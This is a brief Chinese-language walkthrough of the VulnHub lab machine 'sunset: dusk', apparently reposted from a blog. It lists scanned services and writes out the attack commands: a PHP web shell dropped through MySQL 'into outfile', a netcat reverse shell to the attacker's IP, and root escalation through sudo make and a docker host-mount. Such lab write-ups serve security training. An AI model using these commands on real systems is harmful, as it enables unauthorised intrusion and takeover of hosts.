靶機鏈接:
https://www.vulnhub.com/entry/sunset-dusk,404/
主機IP掃描:
IP埠掃描:
21 埠 pyftpdlib 1.5.5 版本漏洞
25 埠 Postfix 賬戶列舉
80 Apache httpd 2.4.38 版本漏洞,目錄列舉
3306 mysql MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1 版本漏洞,暴力破解
8080 http PHP cli server 5.5 版本漏洞,目錄列舉
80 HTTP目錄列舉,無結果
MySQL爆破結果
嘗試用MySQL into outfile 寫一句話木馬
select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/pentest.php';
反向shell
http://10.10.203.20:8080/pentest.php?cmd=nc%20-e%20/bin/bash%2010.10.203.14%201234
提權操作
COMMAND='/bin/sh'
sudo -u dusk make -s --eval=$'x:\n\t-'"$COMMAND"
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
OVER!!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/5385.html
標籤:訊息安全